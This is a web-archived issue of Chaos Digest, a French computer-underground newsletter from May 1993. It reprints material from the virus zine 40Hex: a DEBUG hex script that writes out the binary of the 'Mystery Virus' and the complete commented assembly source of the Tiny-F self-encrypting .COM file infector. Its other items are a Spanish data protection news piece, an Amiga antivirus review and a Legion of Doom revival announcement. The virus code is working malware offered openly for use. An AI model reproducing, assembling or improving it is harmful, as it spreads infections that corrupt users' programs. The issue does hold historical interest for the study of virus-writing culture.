Copy Link
Add to Bookmark
Report

Chaos Digest Volume 01 Numero 40

eZine's profile picture
Published in 
Chaos Digest
 · 4 years ago

  

Chaos Digest Vendredi 28 Mai 1993 Volume 1 : Numero 40
ISSN 1244-4901

Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.40 (28 Mai 1993)
File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)
File 2--Agence de Protection des Donnees Espagnoles (creation)
File 3--"BootX" pour Amiga (critique)
File 4--Nouveau rebondissement de _The Legion of Doom_ (news)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)

[suite du listing du "Mystery Virus":]


e 0530 22 00 8A E0 E8 1D 00 3D 6F 63 74 0C 3D 78 65 75
e 0540 10 E8 10 00 3C 65 EB 09 E8 09 00 3C 6D EB 02 FE
e 0550 C0 5E 58 C3 AC 3C 43 72 06 3C 59 73 02 04 20 C3
e 0560 9C 80 FC 68 2E FF 1E 91 07 C3 1E 06 56 57 50 53
e 0570 51 52 8C DE 33 C0 8E D8 C4 06 90 00 06 50 C7 06
e 0580 90 00 26 03 8C 0E 92 00 8E DE 33 C9 B8 00 43 E8
e 0590 CE FF 8B D9 80 E1 FE 3A CB 74 07 B8 01 43 E8 BF
e 05A0 FF F9 9C 1E 52 53 B8 02 3D E8 B4 FF 72 0A 8B D8
e 05B0 E8 26 00 B4 3E E8 A8 FF 59 5A 1F 9D 73 06 B8 01
e 05C0 43 E8 9C FF 33 C0 8E D8 8F 06 90 00 8F 06 92 00
e 05D0 5A 59 5B 58 5F 5E 07 1F C3 0E 1F 0E 07 BA 95 07
e 05E0 B9 18 00 B4 3F E8 78 FF 33 C9 33 D2 B8 02 42 E8
e 05F0 6E FF 89 16 AF 07 3D 00 0B 83 DA 00 72 6C A3 AD
e 0600 07 81 3E 95 07 4D 5A 75 17 A1 9D 07 03 06 AB 07
e 0610 E8 91 01 03 06 A9 07 83 D2 00 8B CA 8B D0 EB 15
e 0620 80 3E 95 07 E9 75 44 8B 16 96 07 81 C2 03 01 72
e 0630 3A FE CE 33 C9 B8 00 42 E8 25 FF 05 00 07 90 83
e 0640 D2 00 3B 06 AD 07 75 23 3B 16 AF 07 75 1D BA B1
e 0650 07 8B F2 B9 EF 02 B4 3F E8 05 FF 72 0E 3B C8 75
e 0660 0A BF 49 00 AC AE 75 03 E2 FA C3 33 C9 33 D2 B8
e 0670 02 42 E8 EB FE A3 45 07 89 16 47 07 81 3E 95 07
e 0680 4D 5A 74 0A 05 95 09 90 83 D2 00 74 19 C3 8B 16
e 0690 AD 07 F6 DA 83 E2 0F 33 C9 B8 01 42 E8 C1 FE A3
e 06A0 AD 07 89 16 AF 07 B8 00 57 E8 B4 FE 9C 51 52 81
e 06B0 3E 95 07 4D 5A 74 05 B8 00 01 EB 07 A1 A9 07 8B
e 06C0 16 AB 07 2E C7 06 47 00 00 07 BF 3A 07 AB 8B C2
e 06D0 AB A1 A5 07 AB A1 A3 07 AB BE 95 07 A4 A5 33 D2
e 06E0 B9 49 07 90 B4 40 E8 77 FE 72 27 33 C8 75 23 8B
e 06F0 D1 B8 00 42 E8 69 FE 81 3E 95 07 4D 5A 74 15 C6
e 0700 06 95 07 E9 A1 AD 07 05 46 00 A3 96 07 B9 03 00
e 0710 EB 57 EB 5D E8 8A 00 F7 D0 F7 D2 40 75 01 42 03
e 0720 06 AD 07 13 16 AF 07 B9 10 00 F7 F1 C7 06 A9 07
e 0730 49 00 A3 AB 07 05 72 00 A3 A3 07 C7 06 A5 07 00
e 0740 01 81 06 AD 07 49 07 83 16 AF 07 00 A1 AD 07 25
e 0750 FF 01 A3 97 07 9C A1 AE 07 D0 2E B0 07 D1 D8 9D
e 0760 74 01 40 A3 99 07 B9 18 00 BA 95 07 B4 40 E8 EF
e 0770 FD 5A 59 9D 72 06 B8 01 57 E8 E4 FD C3 1E E8 07
e 0780 00 C6 06 00 00 4D 1F C3 50 53 B4 62 E8 D1 FD 8C
e 0790 C8 48 4B 8E DB F9 13 1E 03 00 3B D8 72 F5 5B 58
e 07A0 C3 A1 9D 07 BA 10 00 F7 E2 C3 FE FF FD 00 FE 40
e 07B0 75 73 73 72 40 40 40 40 40 76 89 92 95 73 8F 86
e 07C0 94 40 40 48 83 49 40 40 96 51 4E 40 51 59 59 50
e 07D0 40 FD 00 FE FC FD 00 4A 01 03 01 B8 01 0B 01 4A
e 07E0 01 06 01 72 01 01 02 9F 01 09 01 15 01 02 02 15
e 07F0 01 03 02 72 01 08 01 4A 01 05 02 26 01 01 01 4A
e 0800 01 08 02 15 01 03 02 15 01 03 03 26 01 08 02 26
e 0810 01 05 01 4A 01 01 02 72 01 08 01 72 01 04 01 72
e 0820 01 04 00 72 01 08 02 9F 01 06 02 B8 01 01 02 EE
e 0830 01 0F FF FF FF 00 00 00 01 00 00 00 00 00 00 00
e 0840 01 3A 16 D8 8E C3 8E B8 00 4C 05 00 00 00 1A 1A

rcx
74e
w
q

+++++

40Hex Issue 3 0009

The Tiny-F Virus

In our first issue we gave you the source for the Tiny-B virus.
Well some people don't quit.

After months of struggling Psyco-genius decided to give
his attempts to make this a good virus over to someone who
knows what he's doning.

So Dark (mastered assembler in one week) Angel did some mods
and here we have it.

-------------------------------------------------------------------------
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv

ORG 100h

DOS EQU 21h

start: JMP pgstart
exlbl: db 0CDh, 20h, 7, 8, 9
pgstart:CALL tinyvir
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP, OFFSET exlbl
CALL endecrpt
JMP SHORT realprog

;------------------------------------------------------------------------
;nonencrypted subroutines start here
;------------------------------------------------------------------------

;PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
;Only need to save necessary registers - Dark Angel
PUSH AX ; store registers
PUSH BX
PUSH CX
PUSH SI
;New, better, more compact encryption engine
MOV BX, [SI+EN_VAL]
ADD SI, offset realprog
MOV CX, endenc - realprog
SHR CX, 1
JNC start_encryption
DEC SI
start_encryption:
MOV DI, SI
encloop:
LODSW ;DS:[SI] -> AX
XOR AX, BX
STOSW
LOOP encloop

POP SI ;restore registers
POP CX
POP BX
POP AX
RET
;-----end of encryption routine
nfect:
CALL endecrpt
MOV [SI+offset endprog+3],AX;point to data
MOV AH,40H ;write instruction
LEA DX,[SI+0105H] ;write buffer loc |
MOV CX,offset endprog-105h ;(size of virus) --\|/--
INT DOS ;do it!
PUSHF
CALL endecrpt
POPF
JC outa1 ;error, bug out
RET
outa1:
JMP exit


;------------------------------------------------------------------------
; Unencrypted routines end here
;------------------------------------------------------------------------
realprog:
CLD ;forward direction for string ops
;Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
;Instead, set DTA to SI+ENDPROG+131h
MOV AH, 1Ah ;Set DTA
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
INT 21h

LEA DX,[SI+fspec] ;get filespec (*.COM)
XOR CX, CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT DOS ; ----\/----
JC hiccup ;no more files found, terminate virus
;Next part had to be changed to account for new DTA address - Dark Angel
LEA DX, [SI+ENDPROG+131h+30];set file name pointer
;(offset 30 is DTA filename start)
MOV AX,3D02H ;open file
INT DOS ;do it!
MOV BX,AX ;move file handle to BX
MOV AH,3FH ;read file
LEA DX,[SI+endprog] ;load end of program (as buffer pntr)
MOV DI,DX ;set Dest Index to area for buffer
MOV CX,0003H ;read 3 bytes
INT DOS ;do it!
CMP BYTE PTR [DI],0E9H ;check for JMP at start
JE infect ;If begins w/JMP, Infect
nextfile:
MOV AH,4FH ;set int 21 to find next file
JMP mainloop ;next file, do it!
hiccup: JMP exit
infect:
MOV AX,5700h ;get date function
INT DOS ;do it!
PUSH DX ;store date + time
PUSH CX
MOV DX,[DI+01H] ;set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
;Tighter Code here - Dark Angel
XOR CX,CX ; " " " " " " (0 here)
MOV AX,4200H ;move file
INT DOS ;do it!
MOV DX,DI ;set dest index to area for buffer
MOV CX,0002H ;two bytes
MOV AH,3FH ;read file
INT DOS ;do it!
CMP WORD PTR [DI],0807H ;check for infection
JE nextfile ;next file if infected
getaval: ;encryption routine starts here
;My modifications here - Dark Angel
MOV AH, 2Ch ;DOS get TIME function
INT DOS ;do it!
OR DX, DX ;Is it 0?
JE getaval ;yeah, try again
MOV word ptr [si+offset en_va], DX ; Store it
;Tighter code here - Dark Angel
XOR DX,DX ;clear regs
XOR CX,CX ; " "
MOV AX,4202H ;move file pointer
INT DOS ;do it!
OR DX,DX ;new pointer location 0?
JNE nextfile ;if no then next file
CMP AH,0FEH ;new pointer loc too high?
JNC nextfile ;yes, try again
CALL nfect
MOV AX,4200H ;move pointer
XOR CX, CX ;clear reg
MOV DX,OFFSET 00001 ;where to set pointer
INT DOS ;do it!
MOV AH,40H ;write to file
LEA DX,[SI+offset endprog+3];write data at SI+BUFFER
MOV CX,0002H ;two bytes (the JMP)
INT DOS ;do it!
MOV AX,5701h ;store date
POP CX ;restore time
POP DX ;restore date
INT DOS ;do it!
exit:
MOV AH,3EH ;close file
INT DOS ;do it!

;Return DTA to old position - Dark Angel

MOV AH, 1Ah ;Set DTA
MOV DX, 80h ; to PSP DTA
INT 21h

JMP BP

;------------------------------------------------------------------------
;encrypted data goes here
;------------------------------------------------------------------------

fspec LABEL WORD
DB '*.COM',0
nondata DB 'Tiny-F version 1.1' ;Program identification
DB '%$!"&%',=)%&-!' ;author identification
DB 'Released 10-19-91' ;release date
endenc LABEL BYTE ;end of encryption zone
;------------------------------------------------------------------------
;nonencrypted data goes anywhere after here
;------------------------------------------------------------------------

blnkdat LABEL WORD
DW 0000H

;Only en_val is needed now because of new encryption mechanism
en_val DW 0h

endprog LABEL WORD
tinyv ENDS
END start

+++++

40Hex Issue 3 0010

In Closing

Well that will do it for this issue. Sorry it took so damn long,
but screw it.

Next issue we will have more articals, more viruses, and all that.

We were supposed to have an interview with an Amiga virus writer
this issue but we just couldn't get it in time. Also we were
planning an interview with John Mcafee, but the same story there.

Also next issue, I hope to have the Bob Ross virus, from the
twisted mind of Dark Angel. And If I can find it, the DIR-2 virus
and The Teqeulla Virus, so I can't spell.

See you then.

------------------------------

Date: Sun, 16 May 93 21:01:10 -0100
From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo )
Subject: File 2--Agence de Protection des Donnees Espagnoles (creation)


CCCCC LL II
CC LL II
CC LL II -- N E W S FROM S P A I N --- May 16, 1993
CCCCC LLLLLL II

COMMISSION for LIBERTIES
and INFORMATICS (*)


DATA PROTECTION AGENCY CREATED BY THE SPANISH COVERNMENT
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The Government of the Kingdom of Spain approved on May 4th, 1993 the
Estatute of the Data Protection Agency (Agencia de Proteccion de Datos), the
body that, according to the Law on Protection of Personal Data (whose acronym
is LORTAD) approved by the Spanish Parliament in October 1992, will watch
over proper observance of this law.

According to its Estatute, the Agency is an independent body, headed
by its Director, who will be nominated by the Government among the members
of the Consultive Council. The Council will have nine members, elected for
a period of four years by the Congress, the Senate, the Ministry of Justice,
the Regional Governments, the Federation of Provinces and Cities, the Royal
Academy of History, the Council of Universities, the Council of Consumers and
Users, and the Council of Chambers of Commerce, respectively. Trade Unions
and DP Professionals will not be represented in spite of the proposals of
CLI, that also submitted one of having the Director nominated by the Council
itself instead of by the Government in order to insure the independence of
the Agency

Among the powers of the Agency are those of dictating fines of up to
1 Million US $ and sealing personal data files of companies and entities that
infringe the law. The Agency will the body representing Spain in the European
Community, the Council of Europe and the Schengen Agreement on free
circulation of people within the EC borders for all the matters regarding
personal data protection.

The Data Protection Agency will have to be created in the middle of a
sharp campaign for Congress and Parliament in elections that will be held on
June 6, whose outcome, according to the polls, will be very tight between the
ruling Socialist Party and the center-right People's Party, with a well
placed third party: United Left (a communist-led coalition). These two
parties gave strong support to the position of CLI with regard to the LORTAD
during its discussion in Congress and Senate.

CLI achieved in February its goal of seeing the appeal against the
Personal Data Law put before the Constitutional Court of Spain by the
Ombudsman, the Peoples' Party and the Regional Parliament of Catalonia. The
appeals address basically the concerns of CLI that the law establishes a lot
of unjustified exceptions in favour of Government with regard to the rights
that citizens have about their personal data. Even though the appeals don't
interrupt the application of the law since Jan. 31, they leave the door open
to its modification in the sense promoted by CLI.

Let's recall that Spain is one of the very few countries whose Carta
Magna foresees the dangers that can stem from misuse of Information
Technology. In fact, its Constitution establishes that a "law will limit the
use of Information Technologies in order to protect citizens' honour and
their personal and family privacy as well as the unrestricted exercise of
their rights" (article 18.4).

The position of CLI about the LORTAD can be summarized as follows:

- The law does not fulfill the expectations arisen, although it is a step
forward in comparison with the current situation of "allegality" that has
been a constant source of severe abuse against privacy;

- The good side of the law is the regulation of personal data files
in the hands of companies and private entities. Citizens will have
wide rights to access, modification and cancellation of this kind of
records.

- The bad side stems from the following facts:

a) The bill gives excessive and uncontrolled power to Policy Forces
over collection and computerization of highly sensitive data: ideology,
religion, beliefs, racial origin, health and sexual orientation.

b) Computerized personal data records in the hands of all branches
of Public Administrations will be in many cases excluded from the rights
(access, modification, cancellation) given to citizens with regard to
the same kind of data in the hands of private companies.

c) The Data Protection Agency that will watch over proper observance of
the law will have scarce autonomy from the Government, that will
nominate and dismiss its Director.


* SOME WORDS ABOUT CLI

The --Commission for Liberties and Informatics, CLI-- is an independent
and pluralistic organization that was officially constituted in April '91.

Its mission is to "promote the development and protection of citizens'
rights, specially privacy, against misuse of Information Technologies".

As of May '93, CLI is composed by nine organizations, with a joint
membership of about 3,000,000 people. They cover a very wide spectrum of
social interest groups: associations of computer professionals, judges, civil
rights leagues, trade unions, consumers groups, direct marketing industry,
etc.

CLI is confederated with similar bodies created in some other Spanish
Regions such as Valencia, Basque Country and Catalonia, and has fluid
working relationships with many public and private Data Protection bodies
and entities all over the world, including CNIL, CPSR and Privacy
International.

CLI has its headquarters in:

Padilla 66, 3 dcha.
E-28006 Madrid, Spain

Phone: (34-1) 402 9391
Fax: (34-1) 309 3685
E-mail: rfcalvo@guest2.atimdr.es

------------------------------

Date: Sun May 23 00:06:00 -0600 1993
From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep )
Subject: File 3--"BootX" pour Amiga (critique)
Copyright: Robert M. Slade, 1993


Comparison Review

Company and product:

Peter Stuer
Kauwlei 21
B-2550 Kontich
Belgium
Peter.Stuer@p7.f603.n292.z2.FidoNet.Org
BootX 5.23

Summary: Scanner and disinfector with some operation restriction

Cost: unknown

Rating (1-4, 1 = poor, 4 = very good)
"Friendliness"
Installation
Ease of use
Help systems
Compatibility
Company
Stability
Support
Documentation
Hardware required
Performance
Availability
Local Support

General Description:

Comparison of features and specifications

User Friendliness

Installation

Both automated and manual installation is provided.

Ease of use

BootX can be run from either the CLI or the Workbench. Once invoked it can
be made the "foreground task" by a "hot key" call. The program is menu
driven, with a comprehensive range of actions.

Help systems

Can use the AmigaGuide.library function if available.

Compatibility

Unknown but unlikely to cause problems. Some problems are noted with
Enforcer. Will work with certain compression programs to check compressed
executables.

Company Stability

Unknown, but this is currently one of the major recommended Amiga antivirals.
The program is distributed as freeware.

Company Support

The author's mail and email addresses are given, as well as contact info for
"Safe Hex International".

Documentation

Simple but straightforward directions on the installation and running of the
program. There is little general discussion of viral programs and operation,
but some is mentioned in conjunction with certain features of the program.
Unusually for a shareware/freeware package there is an extensive glossary
which may provide some background. (I learned, for instance, that a
"linkvirus" is the term for what is more generally known as a program or file
infecting virus).

System Requirements

512K RAM or higher and at least one disk drive. KickStart v2.04 and
ReqTools.library v38 or higher. Workbench v2.1 or higher to use the language
independence utility and v3.0 or higher to use the AmigaGuide.library help
feature. Various decompression programs may be needed to check compressed
executables.

Performance

Unknown at this time due to lack of a test suite. Currently one of the most
highly recommended Amiga antivirals.

Local Support

The author is reachable via Fidonet and Internet mail.

Support Requirements

Users experienced with using shareware should have no problems.

==============
Vancouver ROBERTS@decus.ca | Slade's Law of Computer
Institute for Robert_Slade@sfu.ca | Literacy:
Research into rslade@cue.bc.ca | - There is no such thing
User p1@CyberStore.ca | as "computer illiteracy";
Security Canada V7K 2G6 | only illiteracy itself.


[ChaosD: Voici les commentaires de l'auteur de ce programme sur ce papier:]

Date: Wed May 26 17:58:49 PDT 1993
From: Peter.Stuer@p7.f603.n292.z2.fidonet.org (Peter Stuer )

Hum...seems you're a bit behind on the news. I stopped developing BootX last
March because of lack of time.

/~\
C oo
_( ^)
/ ~\ Peter Stuer.

--
uucp: uunet!m2xenix!puddle!2!292!603.7!Peter.Stuer
Internet: Peter.Stuer@p7.f603.n292.z2.fidonet.org

------------------------------

Date: Tue, 25 May 1993 10:32:28 -0400
From: tdc@zooid.guild.org (TDC )
Subject: File 4--Nouveau rebondissement de _The Legion of Doom_ (news)


Final Anouncement

The
LOD
Legion of Doom
Is Back!

No that has not been a mis-print... the LOD has returned! The world's
greatest hacking group has formally been reinstated to bring back dignity
and respect to a scene that has rapidly deteriorated since its departure.

The LOD is not just another "Group" that goes around with upper/lower case
names, trading in PBX's and VMB's and wouldn't know COSMOS if it hit them
over the head. It's a sad day indeed when the term hacker is used to refer
to every code and credit card abusing rodent in the nation. We intend
through our presence and many innovative projects, not to mention the
technical journal to restore the original values of technical exploration
and knowledge that the term hacker was founded on.

The LOD imbodies the pinnacle of understanding that comes from relentless
exploration of the "system" backwards and forwards. It is an organization
dedicated to understanding the world's computer and telephone networks.
Enabling everyone to progress forward in technology. The accumulated product
of this--the Technical Journals, full of information unavailible anywhere
except from telco manuals represents something to valuable to lose.

[...] This will be the primary of purpose the new, revived LOD - the assembly
and release of a Technical Journal. The previous four issues, now several
years old BADLY need updating.

The Journal will rely heavily on reader submitted articles and information,
so anything you wish to contribute would be GREATLY appreciated. Acceptable
submitions would include ORIGINAL "how-to- guides" on various systems,
security discussions, technical specifications and doccumentation. Computer
and telephone related subjects are not the only ones acceptable. If you
remember the former journals had articles concerning interrogation, physical
security among others.

The next LOD Technical Journal will comprise almost entirely of freelance or
reader submitted articles. So without YOUR contributions it can not proceed!
Solid progress is being made in the next Technical Journal by both free-
lancers and group members. But bigger is better, as you can never have too
much information or instruction.

SEND UP ALL ORIGINAL ARTICLES FOR PUBLICATION!!!

If you wish to hold the wonderful honour of being an LOD Member (Won't
this look good on the resume), you may apply by contacting us. The
qualifications should need no elaboration.

Regardless of the unbased claims made by others, the LOD is as strong and
capable as it ever was. Legendary groups like the LOD are not born this way.
They take time to form, and restarting almost from scratch almost three years
later, time is obviously needed. We say to all the skeptics, hang on to your
premature judgements until we're on our feet and judge by actions not
opinions.

To set the record straight once and for all, and to convince the skeptics
that doubt the validity of all this, the Legion of Doom >IS< BACK. Next
month, a full-fledged Technical Journal will be widely released, and you're
doubts and questions will be once and for all answered with uncontestable
fact.

In addition to needing articles for the upcoming Journals, some sites on the
net to aid in distribution would also be welcomed. Someone willing to donate
the resources necessary to operate a subscription type mailing list service
is also needed. Send all offers and articles to our email account or PO Box.

Reach us at: tdc@zooid.guild.org

Or by blindingly quick, faster than light mail at:

LOD
P.O. Box 104
4700 Keele Street
North York, ON M3J-1P3

Closing date for article submittions to the LOD Technical Journal
Number 5 is: Monday 14 June, 1993.

Release date: Friday 18 June, 1993.

Since we have no monetary or contractual obligation to anyone, these dates
are of course tentative. But since or at least initially we will rely almost
entirely on reader submitions a date is needed to get potential writers into
gear.

Note that the LOD does not engage or condone illegal or criminal activities.
This would cover, but is not limited to, theft of long distance services,
credit fraud or data destruction/alteration.

Lord Havoc

------------------------------

End of Chaos Digest #1.40
************************************

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT